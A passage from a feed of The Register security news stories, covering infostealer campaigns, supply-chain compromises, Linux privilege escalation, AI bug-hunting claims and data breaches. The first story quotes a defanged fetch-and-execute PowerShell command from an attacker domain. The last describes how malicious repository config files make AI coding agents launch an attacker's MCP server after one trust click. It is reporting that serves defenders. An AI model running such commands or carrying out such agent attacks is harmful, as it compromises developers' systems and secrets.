News

Cookie thieves caught stealing dev secrets via fake Claude Code installers

The Register - 1 hour 22 min ago
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: News

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

The Register - 5 hours 12 min ago
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: News

BWH Hotels guests warned after reservation data checks out with cybercrooks

The Register - 7 hours 9 min ago
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
Categories: News

Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged

The Register - 9 hours 32 min ago
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. It updated customers on Saturday, May 9, after discovering a version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, was made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. Installed by several hundred controllers, the plugin remains available at the time of writing, and appears as the most recently available version, although pull requests actioned on Monday morning suggest this will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the early supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware. These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugins page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now,” and altering the description to claim CheckMarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As previously seen in The Register, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®
Categories: News

Taiwan's train cyber-trauma reveals a global system that’s coming off the tracks

The Register - 13 hours 13 min ago
OPINION There are three little words to make the heart beat faster in anyone who knows what they mean: critical infrastructure resilience. If you run that infrastructure or a country dependent on it, you need energy, communication and transport to be impregnable to cyber attacks. This is doubly so if that country is five minutes by incoming missile from an implacable hyper-competent enemy sworn to invade you. One that is building and equipping its military as fast as it can with this one thing in mind. One with the most invasive and brazen state hacking machinery on the planet. Thus it was a very bad day indeed when Taiwan’s entire bullet train system was disabled for nearly an hour by an unknown attacker. It got even worse when that attacker turned out not to be the implacable and hyper-resourced state actor over the Taiwan Strait, but a university student with a yen for radio and some kit he bought online. On the one hand, it’s good to see the good repair of the grand tradition of young hackers causing havoc from their bedrooms. On the other, WTRF? The information released by the Taiwanese authorities is scant on details, but enough to be pretty sure what actually happened. It’s bad news not just for Taiwan but for more than 100 countries that also use the TETRA two-way radio standard involved, often for emergency services. In many cases, it was the default replacement for unencrypted FM two-way radios, adding encryption, flexibility and network security. These were state of the art when TETRA was developed in the 1980s and 1990s — and work as well in 2026 as you might expect. Oops. There have been upgrades and, especially after the 2023 vulnerability disclosures, an accelerated program of making things better. A lot of the installed base globally is old, lacks over-the-air updates for security, and in any case spending money on new radios is normally at the bottom of the list for any state or public service organizations. Things have to get really bad first. Perhaps they just have. (North America is the only region where TETRA is uncommon, as it isn’t approved for public service use. This was either acute foresight or the fact that the TE in TETRA, now officially TErrestrial, used to stand for Trans-Europe. The American system, P.25, has never, however, been renamed Freedom Frequencies. Now on with the show) The network vulnerabilities are one side of the story. Our doughty hacker is the other. Reportedly, he didn’t have any TETRA hardware, but a laptop connected to a radio and an ‘SDR filter’. The latter makes little sense, it is far more likely that he had a software defined radio (SDR) called a HackRF. There are plenty of other devices that could have been used, but the HackRF is the weapon of choice for the gung-ho radio nut. SDR is a technique that has completely changed the rules of how to radio. All radios before it had to be entirely or mostly analog, with precision hardware dedicated to whatever job each radio had to do. This hardware could also be looked at as an analog computer, as it can be modelled as a set of mathematical transformations on the received signal. Analog computers have their place, just not in the 21st century. SDR is radio as digital computer. At heart, it has three components: an analog to digital converter to turn the incoming signal to a stream of numbers, very fast processing to do the radio math, and a digital to analogue converter to play the results. What you get is triply terrific. Digital processing is perfect, analog processing adds noise and distortion. Nothing is fixed, everything can be re-engineered with new code. And it can be hog-whimperingly cheap. HackRF is all those things and more. It can be configured as a portable touch-screen device. It transmits and receives from DC to daylight. You can pick one up for less than the price of a mid-range mobile. It is open source. It works with all manner of SDR creation tools, utilities and radio packages. There are infinite legitimate uses. Most excitingly, you can download apps for it that do everything, most especially the kind of thing that will introduce you with surprisingly rapidity to a wide range of new friends with no sense of humor and love letters that look suspiciously like arrest warrants. Think of it as speed dating but with more guns and less no thank yous, GPS spoofing, aviation and marine location transponders, satellite comms, data eavesdropping and injection - take your pick. You’ll need it to unlock the cell door. It is the data detection and injection that seems to have been the downfall of all concerned. A handset had its transmission decoded, and the result was retransmitted into the system as if it were that original radio. Whether the decoded data already had the General Alarm set, or whether the data had to be modified before retransmission, is not yet known. Doesn’t matter. It’s called a replay attack, and it has and is mostly used in stand-alone devices called code grabbers to unlock and steal expensive cars with wireless keys. Some countries, including Canada and the UK, have banned code grabbers, but this has failed on two counts. Code grabbers are small gadgets that can be bought online from China, and good luck policing that. Also, thieves are notably indifferent to laws. That notwithstanding, the UK is thinking of extending the ban to other classes of naughty wireless, and would doubtless like to do the same with HackRF, at least as of last week. Of course, they can’t be banned. SDRs can’t be banned as a class, especially open source ones made out of standard chips and open code. They are general purpose computers, albeit with specialisms. It doesn’t matter if you’re dismayed or delighted that things like HackRF exist, that genie is out of the bottle. What is truly dismaying is that replay attacks are a solved problem, trivially so. Choose a big keyspace, randomize and never repeat keys. That one is on lazy car makers and, apparently, the world of TETRA. Fixing that class of lazy, outdated security vulnerability will be very expensive. Embedded systems are like that, especially old ones. Not fixing this will be a gamble with infinite downside, in a world where electronic warfare systems that used to cost hundreds of millions now pour out of Ali Express for a few bucks. HackRF is to Tetra like Crocodile Dundee’s knife is to the mugger’s. Critical infrastructure resilience. Just three little words, but if you say them you better mean it. And it won’t be cheap. ®
Categories: News

Worm rubs out competitor's malware, then takes control

The Register - Fri, 08/05/2026 - 18:26
There’s a mysterious framework worming its way through exposed cloud instances removing all traces of TeamPCP infections, but it’s not benevolent by a long shot: Whoever is behind this bit of malware may be cleaning up who came before, but only so they can take their place. Discovered by security outfit SentinelOne’s SentinelLabs researchers and dubbed PCPJack for its habit of stealing previously compromised systems from TeamPCP, the worm was first spotted in late April hiding among a Kubernetes-focused VirusTotal hunting rule. It stood out from known cloud hacktools, said SentinelLabs, because the first action it always takes is to eliminate tools associated with TeamPCP attacks. The script didn’t stop there, though. “We initially considered that this toolset could be a researcher removing TeamPCP’s infections,” SentielLabs said. “Analysis of the later-stage payloads indicates otherwise.” “Analyzing this script led us to discover a full framework dedicated to cloud credential harvesting and propagating onto other systems, both internal and external to the victim’s environment,” SentinelLabs continued. In other words, this thing will harvest credentials from everywhere it can get its hands on, and then find new, unsecured cloud environment targets to spread itself to. TeamPCP came onto the scene late last year, and since then has made a name for itself primarily by undertaking a successful compromise of the Trivy vulnerability scanner. That act spread credential-harvesting malware which attackers then used to pivot to more valuable targets, and became one of the most notable supply chain attacks in recent memory. Unlike TeamPCP’s campaign, which relied on the spread of compromised software by human actors, this one spreads on its own accord. Infections start when already-infected systems look for exposed services, including Docker, Kubernetes, Redis, MongoDB, and RayML, as well as exposed web applications. Once it finds a vulnerable environment, it runs a shell script on the target system that sets up an environment to download additional payloads and searches for TeamPCP processes and artifacts to kill. That part of the infection downloads the worm itself, along with modules to enable lateral movement, parse credentials and encrypt them for exfiltration, and for scanning the web for new environments to infect. From there, the worm goes to work with the second module in its kit that conducts the actual credential thefts. This portion of the infection targets environment variables, config files, SSH keys, Docker secrets, Kubernetes tokens, and credentials from a list of finance, enterprise, messaging, and cloud service targets so long that we recommend taking a look at it here, or just assuming whatever you’re using is probably being targeted. SentinelLabs noted that the lack of a cryptominer in the malware package is unusual, and said the particular services it targeted suggests its goal is either conduct its own spam campaigns and financial fraud with the stolen data, or to make the data it harvests available to those planning similar crimes. The worm's practice of removing TeamPCP files could be opportunistic, or could mean there’s drama going on in the cybercrime world. “We have no evidence to suggest whether this toolset represents someone associated with the group or familiar with their activities,” SentinelLabs noted. “However, the first toolset’s focus on disabling and replacing TeamPCP’s services implies a direct focus on the threat actor’s activities rather than pure cloud attack opportunism.” Because this is a worm relying on unsecured cloud and web app instances ripe for targeting, mitigation recommendations are pretty simple: Keep your cloud platforms secure, and ensure authentication is required even for instances of things like Docker and Kubernetes that aren’t exposed to the internet. ®
Categories: News

'Dirty Frag' Linux flaw one-ups CopyFail with no patches and public root exploit

The Register - Fri, 08/05/2026 - 14:36
A fresh Linux privilege escalation bug dubbed "Dirty Frag" has dropped into the wild with no patches, no CVE, and a public exploit that hands attackers root access across major distributions. Security researcher Hyunwoo Kim disclosed the local privilege escalation flaw on Friday after what he said was a broken embargo forced the issue into the open. Kim described Dirty Frag as a "universal LPE" affecting "all major distributions" and warned that it delivers the same kind of immediate root access as the recent CopyFail mess – only this time, defenders do not even have patches to throw at the problem. "As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions," Kim said. "Because the responsible disclosure schedule and embargo have been broken, no patches exist for any distribution." Dirty Frag works by chaining together two separate Linux kernel flaws. One sits in the xfrm-ESP subsystem and dates back to a January 2017 kernel commit, according to Kim, while the second vulnerability affects RxRPC functionality introduced in 2023. Together, the two bugs allegedly let unprivileged local users overwrite protected files in memory and claw their way to root. A long list of distributions in the firing line, according to Kim, including Ubuntu, Red Hat Enterprise Linux, CentOS Stream, Fedora, AlmaLinux, and openSUSE Tumbleweed. Separately, researchers appear to have independently reverse-engineered part of the bug chain from a publicly visible kernel fix commit before the embargo expired, adding to the disclosure mess already surrounding the flaw. One GitHub project titled "Copy Fail 2: Electric Boogaloo" claims to weaponize the ESP/xfrm side of the issue separately from Kim's full Dirty Frag chain. Kim said maintainers signed off on the disclosure of the flaw after somebody else dumped exploit details online first, collapsing the embargo before patches were finished. So now the exploit is public, the fixes are not, and Linux admins get another long week. The disclosure comes as the industry is still dealing with the fallout from CopyFail, another Linux privilege escalation bug that recently landed in CISA's Known Exploited Vulnerabilities catalog after attackers started cashing in on it in the wild. But Dirty Frag makes the recent CopyFail chaos look relatively organized. There's still no CVE, no coordinated patch rollout, and not much in the way of mitigation. Kim published a temporary workaround that disables affected ESP and RxRPC modules before clearing the system page cache. Useful, perhaps, although "turn bits of the kernel off and hope for the best" is not usually the sort of guidance admins enjoy seeing. ®
Categories: News

Meta U-turns on encryption push for Instagram as DMs go plaintext

The Register - Fri, 08/05/2026 - 13:42
Meta has quietly pulled the plug on encrypted Instagram DMs, meaning private messages on one of the world’s biggest social networks are no longer especially private. The change took effect today, according to a revised Meta post first published in 2022. In a statement to The Register, Meta said the feature saw limited adoption and pointed users toward WhatsApp instead. "Very few people were opting in to end-to-end encrypted messaging in DMs, so we're removing this option from Instagram in the coming months," the spokesperson said. "Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp." It’s quite the reversal for a corporation that spent years telling everyone that encryption was the future of online communications, even as governments pushed back against the company’s wider rollout plans. Much of that pressure centered on child protection. Campaigners and agencies, including the NSPCC UK’s National Crime Agency, argued wider encryption would make it harder to detect grooming, child abuse material, and other criminal activity taking place over private messaging services. Privacy advocates, however, say Meta has just blown a hole in one of the few genuinely private corners of the platform. The Center for Democracy & Technology said it had urged Meta to reverse the decision, alongside members of the Global Encryption Coalition Steering Committee. “Without default encryption, millions of Instagram users are left exposed to surveillance, interception, and misuse of their private communications,” the group said. “These risks fall hardest on people who rely on secure messaging for their safety, including journalists, human rights defenders, and survivors of abuse.” Swiss privacy outfit Proton also questioned what exactly happens to existing chats once encryption disappears. Because properly implemented E2EE prevents platforms from reading message contents, the company noted that Meta has not clarified whether previously encrypted conversations will remain inaccessible, get deleted, or become readable. “For Instagram, dropping E2EE is just an example of how little regard Meta has for the privacy and safety of its community,” Proton said in a blog post. Meta has become increasingly aggressive about monetizing and analyzing user interactions. Last year, the company confirmed that interactions with Meta AI tools, including those inside private conversations, could be used for ad targeting. The company has not publicly said whether ordinary Instagram messages could eventually feed into similar systems now that encryption is gone. ®
Categories: News

Hackers ate my homework: Educational SaaS Canvas down after cyberattack

The Register - Fri, 08/05/2026 - 11:59
Students around the world have an excuse to bunk off after hacking crew ShinyHunters did something nasty to educational SaaS Canvas. Canvas is widely used by schools and universities to communicate with students, publish and store course material, and collect assignments. An outfit called Instructure develops the software and an entry on its Status Page dated May 2 features Chief Information Security Officer Steve Proud stating the org "recently experienced a cybersecurity incident perpetrated by a criminal threat actor." "We are actively investigating this incident with the help of outside forensics experts. We are working quickly to understand the extent of the incident and actively taking steps to minimize its impact," he added. Numerous posts report that attempts to log into Canvas earlier this week failed, but did produce a notice from an entity claiming to be the notorious hacking crew ShinyHunters, who claimed the outage was only possible due to lax patching. The crew also claimed to have stolen data from institutions that use Canvas and threatened to leak it unless a "settlement" is reached by May 12. Canvas has thousands of customers, meaning any confirmed breach could have wide impact. As of Thursday evening US time, Canvas says its wares are now available "for most users" and won't offer further comment. A student of The Register's acquaintance – OK, one of my kids – shared an email advising that his uni has prevented access to Canvas while it tries to understand the situation and the risk of data leakage. We've seen multiple universities posting notices about the incident that say more or less the same thing. Most also warn students of heightened phishing risk and urge caution. Several also advise that as they require students to lodge assignments in Canvas, students can assume they have an extension on deadlines. Your correspondent's offspring does not mind this one little bit. This is an evolving story. The Register will update it as more information becomes available. ®
Categories: News

Meta fights Ofcom over how many billions count as billions

The Register - Fri, 08/05/2026 - 11:39
Meta appears to have decided Britain's Online Safety Act would be much easier to swallow if Ofcom stopped counting all the money the social media giant makes everywhere else. The Facebook and Instagram owner has launched a legal challenge against the UK comms regulator, arguing that the way Ofcom calculates fees and potential penalties under the Online Safety Act is fundamentally wrong because it relies on global turnover rather than UK-specific revenue. The law allows Ofcom to fine companies for up to 10 percent of their qualifying worldwide revenue, or £18 million, whichever is higher. For Meta, which brought in about $201 billion last year, that means the numbers stop sounding like regulatory penalties and start sounding like national infrastructure projects. Meta is now seeking a judicial review in the High Court over how Ofcom defines "qualifying worldwide revenue." The dispute boils down to three complaints. First, Meta argues that Ofcom should only consider UK revenue tied to regulated services, not the company’s global income. Second, it objects to rules that treat multiple services under the same corporate umbrella as jointly liable, potentially exposing the wider organization to larger penalties. Third, it is challenging how Ofcom aggregates revenue across services rather than assessing them individually. An Ofcom spokesperson told The Register: "Meta have initiated a judicial review in relation to online safety fees and penalties. Under the Online Safety Act, these are to be set with reference to a provider's 'Qualifying Worldwide Revenue', which we have defined based on a plain reading of the law. "Disappointingly, Meta are objecting to the payment of fees, and any penalties that could be levied on companies in future, that are calculated on this basis. We will robustly defend our reasoning and decisions." A Meta spokesperson told The Register: "We are committed to cooperating constructively with Ofcom as it enforces the Online Safety Act. However, we and others in the tech industry believe its decisions on the methodology to calculate fees and potential fines are disproportionate. We believe fees and penalties should be based on the services being regulated in the countries they're being regulated in. This would still allow Ofcom to impose the largest fines in UK corporate history." The case marks the latest flare-up between Silicon Valley and Britain over the Online Safety Act, which has already triggered complaints from US politicians, free speech campaigners, and tech firms unhappy about the scale of Ofcom’s new powers. The regulator has not been shy about flexing them either. It has already threatened action against Elon Musk's X over sexually explicit AI-generated images linked to Grok and, in March, issued its first fine under the regime against 4chan. Meta appears to have looked at where that enforcement road leads and decided now was the time to argue about the math. ®
Categories: News

Mozilla boasts Mythos boosted Firefox bug cull

The Register - Fri, 08/05/2026 - 00:32
Mozilla fixed 423 Firefox security bugs in April, a repair rate more than five times higher than the 76 fixes issued in March and almost 20 times higher than its 21.5 monthly average last year. The browser maker previously said Anthropic's ballyhooed Mythos Preview model found 271 of these in Firefox 150. Now, a trio of technical types has come forward to provide a bit more detail about what Mythos (and its less storied sibling Opus 4.6) actually found. But they also highlight something that may matter more than the model: the agentic harness – the middleware mediating between AI and the end user. Brian Grinstead, Firefox distinguished engineer, Christian Holler, Firefox tech lead, and Frederik Braun, head of the Firefox security team, observe that over the past few months, AI-generated security reports have gone from slop to rather more tasty. They attribute the transformation to better models and development of better ways of harnessing those models – steering them in a way that increases the ratio of signal to noise. But they also appear to be aware that there's some skepticism in the security community about Mythos. So they've decided to publicize selected wins in an effort to encourage others to jump aboard the AI bug remediation train. "Ordinarily we keep detailed bug reports private for several months after shipping fixes and issuing security advisories, largely as a precaution to protect any users who, for whatever reason, were slow to update to the latest version of Firefox," they said. "Given the extraordinary level of interest in this topic and the urgency of action needed throughout the software ecosystem, we’ve made the calculated decision to unhide a small sample of the reports behind the fixes we recently shipped." The post links to a dozen Firefox bugs with varying degrees of severity. The list includes, for example, a 20-year-old heap use-after-free bug (high severity) that a web page could trigger using the XSLTProcessor DOM API without any user interaction. Many of these bugs are sandbox escapes, they note, which are difficult to find using techniques like fuzzing. AI analysis, they say, helps provide broader security coverage. And they add that it has helped validate prior browser hardening work designed to prevent prototype pollution attacks – audit logs showed AI models making unsuccessful exploitation attempts using this technique. Following Anthropic's announcement of Project Glasswing – a program for companies to gain early access to Mythos because it's touted as too dangerous for public release – security experts expressed skepticism. For example, Davi Ottenheimer, president of security consultancy flyingpenguin, wrote in an April 13 blog post, "The supposedly huge Anthropic 'step change' appears to be little more than a rounding error. The threat narrative so far appears to be ALL marketing and no real results. The Glasswing consortium is regulatory capture dressed up poorly as restraint." He subsequently ran a test in which he strapped Anthropic's lesser models Sonnet 4.6 and Haiku 4.5 into a harness called Wirken with an auditing skill called Lyrik. The result was eight findings in two minutes at a cost of about $0.75, Ottenheimer claims, noting that two of the eight matched bugs Mythos had identified. Other security folk have also reported that bug hunting and exploit development can be quite productive with off-the-shelf models like Opus 4.6, which among other virtues costs about 5x less than Mythos. In an email to The Register, Ottenheimer said, "There's a fundamental philosophical failure in the Mozilla post. A reading and a measurement are not the same thing. I don't see a measurement, but they seem to want us to believe we're looking at one. "When they give us the 'behind the scenes math' it's circular, a trick. 'Mythos found 271 bugs' is what Mythos found, not what other tools could not find against the same code. Why leave it as an assumption if it can be proven?" Ottenheimer said Mozilla advocates that every project adopt a similar approach without proving the merits of that approach. "It's like saying if you don't drink Coca-Cola, you can't run a mile under six minutes, because that's what a guy sponsored by Coca-Cola just did," he said. "The bar moves on rhetoric, marketing, not proper evidence. That is the capture crew again." He notes that the merits of Mythos might be more convincing if Mozilla had reported they couldn't do this work without Mythos. And since they're not saying that, he suggests, it's worth asking why there's no transparent comparison of Mythos to other models. He points to Mozilla's admission that Opus 4.6 was already identifying "an impressive amount of previously unknown vulnerabilities." "Mozilla never quantifies what Opus 4.6 [did] before saying what Mythos added," he said. "So 271 attributed to Mythos doesn't fit the analysis. And there's a deeper reveal when they say 'we dramatically improved our techniques for harnessing these models.' The improvement may be entirely in the harness, not as much in the model. This maps to my own experience. A nail gun has advantages over the hammer, yet without being in the right hands the outputs are as bad or worse." ®
Categories: News

Anthropic response to 1-click pwn: Shouldn't have clicked 'ok'

The Register - Thu, 07/05/2026 - 21:03
How explicit does the maker of a footgun need to be about the product's potential to shoot you in the foot? That's essentially the question security firm Adversa AI is asking with the disclosure of a one-click remote code execution attack via an MCP server in Claude Code, Gemini CLI, Cursor CLI, and Copilot CLI. The TrustFall proof-of-concept attack demonstrates how a cloned code repository can include two JSON files (.mcp.json and .claude/settings.json) that open the door to an attacker-controlled Model Context Protocol (MCP) server. MCP servers make tools, configuration data, schemas, and documentation available in a standard format to AI models via JSON. The vulnerability arises from inconsistent restrictions governing the scope of settings: Anthropic blocks some dangerous settings at the project level (e.g. bypassPermissions) but not others (e.g. enableAllProjectMcpServers and enabledMcpjsonServers). The JSON files simply enable those settings. "The moment a developer presses Enter on Claude Code's generic 'Yes, I trust this folder' dialog, the server spawns as an unsandboxed Node.js process with the user's full privileges — no per-server consent, no tool call from Claude required," Adversa AI explains in its PoC repo. The likely result is a compromised system. The PoC demonstrated in this video. It worked on Claude Code CLI v2.1.114, as of May 2. Other agent CLIs are also said to be affected, but specific PoCs have not been published. "It's the third CVE in Claude Code in six months from the same root cause (project-scoped settings as injection vector)," Alex Polyakov, co-founder of Adversa AI, told The Register in an email. "Each gets patched in isolation but the underlying class hasn't been finally fixed. Most developers don't know these settings exist, let alone that a cloned repo can set them silently." Anthropic, according to the security biz, contends that the user's trust decision moves the issue outside its threat model. CVE-2025-59536 was considered a vulnerability because it triggered automatically when a user started up Claude Code in a malicious directory. TrustFall, however, is considered out of scope because the user has been presented with a dialog box and made a trust decision. Adversa argues that the decision is not being made with informed consent, citing a prior, more explicit warning notice that was removed in v2.1 of the Claude Code CLI. "The pre-v2.1 dialog explicitly warned that .mcp.json could execute code and offered three options including 'proceed with MCP servers disabled,'" writes Adversa's Sergey Malenkovich. "That informed-consent UX was removed. The current dialog defaults to 'Yes, I trust this folder' with no MCP-specific language, no enumeration of which executables will spawn, and no opt-out for MCP while keeping the rest of the trust grant." Then there's the zero-click variant to consider for CI/CD pipelines that 